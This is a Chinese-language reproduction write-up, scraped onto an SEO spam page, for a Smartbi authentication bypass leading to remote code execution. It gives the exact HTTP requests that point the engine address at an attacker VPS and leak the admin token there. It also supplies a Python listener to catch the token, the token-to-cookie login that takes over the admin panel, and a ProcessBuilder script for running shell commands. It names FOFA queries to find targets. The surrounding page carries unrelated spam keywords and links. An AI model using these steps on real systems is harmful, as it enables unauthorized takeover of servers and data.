当前位置: 首页 > news >正文

网络口碑营销的特点宁波seo

网络口碑营销的特点,宁波seo,ppt网站模板,乌鲁木齐新市区建设局网站0x01 产品简介 Smartbi大数据分析产品融合BI定义的所有阶段,对接各种业务数据库、数据仓库和大数据分析平台,进行加工处理、分析挖掘和可视化展现;满足所有用户的各种数据分析应用需求,如大数据分析、可视化分析、探索式分析、复杂…

0x01 产品简介

   Smartbi大数据分析产品融合BI定义的所有阶段,对接各种业务数据库、数据仓库和大数据分析平台,进行加工处理、分析挖掘和可视化展现;满足所有用户的各种数据分析应用需求,如大数据分析、可视化分析、探索式分析、复杂报表、应用分享等等。

0x02 漏洞概述

    Smartbi在特定情况下可被获取用户token,未经授权的攻击者可通过这种方式获取管理员权限,从而以管理员权限接管后台,进一步利用可实现任意代码执行。利用此漏洞需目标可出网。  

0x03 影响范围

  V6 <= Smartbi <= V10

0x04 复现环境

FOFA:app="SMARTBI"

c9043c3d0bdc4b84888755d49baca9e3.png

0x05 漏洞复现

 更新内部引擎地址

POST /smartbi/smartbix/api/monitor/setEngineAddress HTTP/1.1
Host: your-ip
Content-Type: application/jsonhttp://vpsip:8000

6b9b1d116b294f56a943a172979fbc70.png

 PS:有的环境url不一样,区别在于有没有多一层“/smartbi” 目录,自行根据实际环境测试,如下

f379e7c7ce0245f2a4733423f140ed51.png

56df95d82deb4aae91342eda69287fff.png 验证地址更新的情况 

POST /smartbi/smartbix/api/monitor/engineInfo HTTP/1.1
Host: your-ip
Content-Type: application/json

c9aa86edc7334a5ba8dcffa9b6bfb724.png

 发送管理员token到vps(不能使用nc监听,由于nc监听或者返回的值不是json格式,导致报错,获取的token没被存入对应的变量中,无法进行绕过,所以需要手动编写⼀个http服务,用于监听返回的数据为任意json格式)

脚本:

import json
from http.server import BaseHTTPRequestHandler, HTTPServerclass RequestHandler(BaseHTTPRequestHandler):def do_POST(self):content_length = int(self.headers['Content-Length'])post_data = self.rfile.read(content_length).decode('utf-8')print(f'Received data: {post_data}')# 解析post_data,并构建要返回的JSON数据data = json.loads(post_data)response = {'message': 'Data received successfully'}# 设置响应头和状态码self.send_response(200)self.send_header('Content-type', 'application/json')self.end_headers()# 将JSON数据转换为字节流并发送回客户端self.wfile.write(json.dumps(response).encode('utf-8'))def run_server():server_address = ('', 8000)httpd = HTTPServer(server_address, RequestHandler)print('Server is running...')httpd.serve_forever()if __name__ == '__main__':run_server()

原理:使用http.server模块来创建一个基于HTTP协议的服务器。它监听本地的8000端口,并在收到POST请求时,将请求体中的数据解析为JSON格式。然后构建一个包含成功消息的JSON响应,并将其发送回客户端。

开启监听,发送token

54ae89e31c954a10b567fb9284848e0b.png

POST /smartbi/smartbix/api/monitor/token HTTP/1.1
Host: your-ip
Content-Type: application/jsonexperiment

6c5903aa9b0640acb72ba205f4a6df07.png

 8fe20ec1313e4ac3b60162db02d0e70c.png

利用管理员token 获取登录后的cookie

POST /smartbi/smartbix/api/monitor/login HTTP/1.1
Host: your-ip
Content-Type: application/json获取到的管理员token

59af1c5d06c3423b9554ff7d4d8c418a.png PS:必须是true,false不管用

替换cookie接管后台

c324629913d14b599e845733b3208ccf.png

替换完刷新页面即可 

ac0f08a7d6d94c439889effb82b92b89.png

 后利用思路:计划任务RCE

importPackage(Packages.java.lang);
importPackage(Packages.java.io);
importPackage(Packages.smartbi.repository);
importPackage(Packages.smartbi.util);
importPackage(Packages.java.util);builder = new ProcessBuilder();
builder.command("sh", "-c", "执行的命令");
builder.directory(new File(System.getProperty("user.home")));
process = builder.start();

0x06 修复建议

临时缓解方案

通过网络ACL策略限制访问来源,例如只允许来自特定IP地址或地址段的访问请求。

升级修复方案

目前官方已发布补丁,建议受影响用户尽快更新至 2023-07-28 安全补丁包:

https://www.smartbi.com.cn/patchinfo

  

 

 

http://www.khdw.cn/news/67363.html

相关文章:

  • 网站建设赫伟创意星空科技上海网站建设关键词排名
  • 遂宁网站制作java成品网站
  • 济南网站建设公司电子商务网站企业内训机构
  • 网页设计和网站设计爱采购seo
  • 贵安新区微信网站建设恩施seo整站优化哪家好
  • 做植物网站优化方案英语
  • 苏州招聘网站建设网站功能开发
  • 酷炫网站推荐百度竞价排名
  • 网站设计用什么软件做的搜索引擎推广试题
  • 做网站怎么插音乐seo技术培训江门
  • 好的做淘宝详情页的网站有哪些合肥seo建站
  • 163手机移动网站苏州关键词优化软件
  • 条形码生成器在线制作二维码游戏优化大师官方下载
  • 开发游戏用什么软件优化网站排名解析推广
  • 程序员怎么做自己的网站app有哪些推广方式
  • 网站开发成本预算价目表邯郸今日头条最新消息
  • 网站建网站建设百度seo快速提升排名
  • 网站开发规格微信卖货小程序怎么做
  • 建筑工人找活平台东莞seo推广
  • 哪些网站是做b2b的怎么样推广自己的产品
  • 哪个网站做logo免费seo视频教程
  • 徐州网站制作需要多少钱商品热搜词排行榜
  • 网站建设与网络编辑综合实训课程指导手册品牌建设
  • 福田企业网站建设可以免费发广告的网站有哪些
  • web如何做网站关键词竞价排名
  • 高端建设网站公司宝鸡seo外包公司
  • wordpress 自定义注册表单北京seo网站优化公司
  • 淘宝可做的团购网站腾讯企业邮箱登录入口
  • 深圳电商网站制作外链网盘
  • 厦门网站建设哪好开发网站建设公司